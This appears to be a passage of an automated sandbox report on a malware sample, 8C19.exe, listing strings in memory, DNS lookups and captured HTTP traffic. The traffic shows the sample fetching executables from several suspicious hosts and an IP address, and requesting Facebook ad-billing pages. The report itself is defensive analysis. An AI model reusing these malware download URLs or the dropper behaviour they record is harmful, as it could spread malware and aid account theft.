Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yk/l/0
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ys/l/0
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yv/l/0
Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz
Source: 956C.tmp.14.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: furubujjul.net

Source: global traffic	HTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic	HTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dldsystem.com
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dldsystem.com
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.174.137.174
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Mon, 17 Oct 2022 20:07:12 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7oALrIoAwhuoYZT%2FCbtR4LGHLUyRcnMhyng2odjyW3I1mQ2IExUezOq3VBgGDyEZAJ4IYG8DPAaOnJFnR9%2FqOqtQysIm9wQBNEQdv5MrRQjKadOdoSF%2BAbWG35g9A9Dwsw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7a89b2606d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 18 00 00 00 1f 3d 52 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 73 d2 09 b6 c9 de db c5 ba 1e d7 7f 00 12 17 00 23 c9 75 21 7d 31 a2 02 6b a5 2d 41 ec 51 18 fa f8 e1 fc b7 d5 59 5e d9 fc 05 8a e6 2e b0 b3 25 e5 ea a7 6b bf aa d2 2a a1 30 2e 91 f4 d1 8f ea 9f c6 25 9c c5 89 09 cb 73 4a b2 26 d8 20 90 41 44 69 cf 7e 2f 45 4f d8 13 77 10 87 39 b4 bf 0f f7 e9 19 82 a7 10 b1 d7 19 1a 19 6a 33 fc 4e ec 20 86 9f cf 03 46 7d f0 e6 e5 4f a4 db 03 b4 3f dc 6e 62 a8 cf d0 14 a1 8b 5a 40 bb 9c 22 79 f8 02 92 87 b6 85 0e 2a 26 b7 a0 50 44 13 d1 ad da 68 6b 16 86 cc 76 b9 cc c2 8b e1 c5 1a 29 ca ae 93 ea 2a 85 ed cb d3 f5 00 0b 8c 84 9b 73 73 ac 0e 89 cf 08 3b 19 e1 d1 18 0b 83 49 65 d5 bc a8 fb f8 75 ea 73 e5 36 e7 89 9e bc fc e0 93 9f 0e 30 e3 b1 93 95 97 a7 51 6e c6 76 98 34 61 81 b9 d4 29 1e 0b 48 34 51 ea a8 27 bd a7 d3 19 7b ba fb 14 37 89 40 35 c9 72 ce ff 7e 73 02 80 1d 34 a3 d6 d5 35 54 16 c0 8c 0b b9 9c 39 cc 5a 58 e4 72 4a e6 3d ac 59 3b f2 1d 17 db 53 f1 f9 f8 6d 3c cd 87 c5 4c 80 7e b9 38 2b 2b 80 c9 45 28 26 8c 39 c1 e6 f7 06 d2 9f 3e 54 78 a5 8f 04 e0 44 d8 60 ef b0 31 16 26 48 3c be 6d 48 19 5f 48 77 e4 60 01 bd 87 b0 1c 9d a1 16 f4 36 d8 35 bf ff c2 92 ea 11 27 67 98 42 42 9d 33 db ad c4 a3 26 8a 4b 66 21 d8 e8 f5 cb c5 74 47 a9 b2 e7 8c 03 31 86 6a da 0d d8 d6 c4 39 45 06 a7 92 40 bc b7 0c ee a1 e3 2d e7 7f ff 08 9e 1a e4 a2 39 f6 af eb 37 f9 22 7e d2 9a 52 2e a6 c0 ce 7d 15 3c f7 86 de a3 9b c7 d1 a6 f5 37 e4 1d 47 e4 a8 f1 e3 34 b5 9d 6b e1 c6 0f 1e c2 d1 4c 69 46 31 be 52 37 2a 13 f1 90 bb 5e 00 af bd cf d3 34 dc cd 26 20 32 30 1e 71 18 15 45 d5 f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 48 8a 79 b3 54 95 5f 47 Data Ascii: 3830=R7f0|gW5p@E74o8s#u!}1k-AQY^.%k*0.%sJ& ADi~/EOw9j3N F}O?nbZ@"y*&PDhkv)*ss;Ieus60Qnv4a)H4Q'{7@5r~s45T9ZXrJ
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KUWoAro4NNt%2FHkTq3NXBVoTYzm8%2Fc5LLM3XNqxMxxhWzGlP2mWwGy8%2Fre%2FGYHfNo4qfoNE4QxZycKeKjM1Podnv%2B%2FcIlHo%2FDXoXYR4HUb95MOqJYDxgqIybV2D7LZ2gXIw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7ab884306d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z0mKA1qbWJO5wreHynT1UWv99rf%2BjxZXEqsThzPL%2BLBuk37HPrPW9ovFsC7%2BmGyfv0XCZSD8y6VqrA%2BMt1YZ%2Brl2uie88lq3%2BVxy7uGGkCRmA85vMOZ9jXW4fOlPB1BQUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7ac496c06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 36 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 32 59 3e b0 2b c6 28 d9 87 96 d3 15 5b 05 0f d6 c0 97 ac f7 a5 3b e2 df 53 23 30 54 1f f5 09 16 5b 6c 32 60 d2 dd 6d 61 20 2a 85 19 69 f7 6b db bb b2 07 5a 83 a4 07 0d 99 17 c4 f8 7a 7c e1 66 a2 cc f8 83 61 34 77 70 36 f8 37 33 50 97 23 f5 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 59 b9 c7 75 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e b7 f6 ff 78 f7 4a db c4 0d 13 13 a9 bf e1 92 24 18 4f c5 03 b1 c9 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a d4 96 be 21 51 61 36 3c 35 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 4b 0e e5 0e 8c eb 7e 71 eb 90 d4 1a b0 d0 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 f0 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 57 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 8d 9b de 8e 82 11 e8 e4 1f ac a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 6c e4 9b 1f d4 4c 6a 91 9c 17 0f f1 2c a8 af 03 5b e5 1f 